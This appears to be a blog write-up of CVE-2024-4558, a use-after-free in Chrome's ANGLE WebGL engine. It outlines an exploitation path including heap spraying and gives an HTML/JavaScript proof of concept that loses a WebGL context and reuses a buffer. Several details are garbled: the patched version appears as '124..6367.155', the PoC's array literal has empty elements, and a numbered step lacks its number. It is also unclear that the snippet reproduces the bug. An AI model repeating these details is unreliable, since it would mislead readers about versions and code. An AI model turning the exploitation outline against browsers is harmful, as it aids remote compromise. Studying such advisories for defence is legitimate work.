CVE-2024-4558 - Exploiting Use-After-Free in Google Chrome's ANGLE Engine

CVE ID: CVE-2024-4558
Affected Software: Google Chrome (prior to 124..6367.155)
Component: ANGLE (Almost Native Graphics Layer Engine)
Impact: Heap Corruption, Potential Remote Code Execution
Severity: High
Attack Vector: Via malicious HTML page

Introduction

On May 2024, a critical security vulnerability was patched in Google Chrome. Tracked as CVE-2024-4558, it lets attackers remotely exploit heap corruption in the ANGLE graphics engine by luring users to a specially crafted HTML page. This post will break down how the bug works, the exploitation path, and showcase code snippets for better understanding.

ANGLE is an open-source graphics engine that translates WebGL calls for running smoothly on various platforms. Because so many web apps and games use WebGL, vulnerabilities here can affect millions.

What Caused the Bug?

This vulnerability is a use-after-free (UAF) issue in ANGLE's code for handling graphics resources. Use-after-free is when a program keeps using a chunk of memory after it’s been released (freed) – leading to bugs, crashes, or even code execution.

This bug can be triggered by manipulating WebGL contexts, objects, or shaders in a certain way. When an attacker crafts a page to exploit the underlying race condition, a free'd object gets used again, possibly allowing control of heap memory.

Commit Fix Reference

- Upstream Chromium fix in ANGLE
- Chrome Release Notes: Stable channel update for desktop
- CVE Details Listing

Create WebGL objects: Set up a WebGL context, shaders, and resources.

2. Trigger object destruction: Through clever sequence (like resizing context, deleting objects, or losing/restoring context), force Chrome to free WebGL resources.
3. Force use-after-free: Keep references to objects and make calls through them *after* they've been freed.
4. Heap manipulation: The attacker sprays the heap with crafted data, increasing chances that the freed memory gets re-used with attacker-controlled contents.
5. Potential impact: Depending on the heap state, this might corrupt memory (leading to crash), escalate to an information leak, or in worst cases, run attacker’s code.

Example Proof-of-Concept (Code Snippet)

Below is a simplified educational snippet that creates a WebGL context and attempts a UAF. Do not use for malicious purposes. This code is meant to demonstrate how easy-to-make mistakes in resource handling can lead to serious vulnerabilities.

<!DOCTYPE html>
<html>
  <body>
    <canvas id="c"></canvas>
    <script>
      let canvas = document.getElementById("c");
      let gl = canvas.getContext("webgl");

      // Step 1: Create resources
      let buffer = gl.createBuffer();
      gl.bindBuffer(gl.ARRAY_BUFFER, buffer);
      gl.bufferData(gl.ARRAY_BUFFER, new Float32Array([, , 1, 1, 2, 2]), gl.STATIC_DRAW);

      // Step 2: Lose context (simulate freeing)
      let ext = gl.getExtension('WEBGL_lose_context');
      ext.loseContext();

      // Step 3: Try to use freed buffer (UAF)
      setTimeout(() => {
        try {
          gl.bindBuffer(gl.ARRAY_BUFFER, buffer);
          gl.bufferData(gl.ARRAY_BUFFER, new Float32Array([3, 3, 4, 4, 5, 5]), gl.STATIC_DRAW);
          console.log("UAF triggered or crash may have happened");
        } catch(e) {
          console.log("Handled exception: " + e);
        }
      }, 50);
    </script>
  </body>
</html>

Real-world exploits are more complicated and use heap grooming for reliable code execution. This simple example is only to show the accident-prone path.

How Attackers Could Use CVE-2024-4558

If an attacker convinces you to visit a malicious web page (or embeds code in an ad), and you’re using an outdated Chrome version, the bug could let them:

Leak memory or sensitive information using primitives built atop heap corruption

- *Potentially* run code in the context of your browser – giving them a route to take over your account or system if chained with other bugs

This is why Google rates the issue as high severity.

Protection & Updates

If you use Google Chrome, update immediately to version 124..6367.155 or later.

Chrome will auto-update if not on the latest version

Other browsers using Chromium (Edge, Brave, Opera, Electron apps) may also be affected. Update promptly.

Conclusion

CVE-2024-4558 highlights how modern browsers deal with complex multimedia code – and how tiny mistakes in memory management can open severe security holes. ANGLE is a crucial layer for graphics on the web, so issues here ripple out to almost everyone.

For more details, check the references

- Google Chromium Bug Tracker Entry (restricted)
- Upstream ANGLE patch commit
- NVD Entry for CVE-2024-4558
- Chrome Security Blog

Timeline

Published on: 05/07/2024 19:15:08 UTC
Last modified on: 07/03/2024 02:07:45 UTC